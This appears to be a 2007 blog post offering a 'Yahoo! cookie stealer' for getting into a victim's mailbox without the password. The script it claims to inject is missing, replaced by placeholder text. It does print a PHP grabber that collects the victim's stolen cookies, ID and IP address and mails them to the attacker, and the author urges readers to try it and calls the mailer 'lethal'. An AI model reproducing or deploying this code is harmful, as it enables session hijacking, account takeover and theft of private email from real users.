Thursday, December 13, 2007

Yahoo! cookie stealer

Yahoo! cookie stealer
Its patched but worth a try

This script can help anyone to acces victims inbox without knowing the password
Only works on IE 5x-6x and only with old Yahoo mailboxes (not with the Beta version)
The Script:

Some text here


Php grabber (mail sender):

$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From:");

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");


even if this is not gonna work... u can alwayz use this.. php mail sender.. which is lethal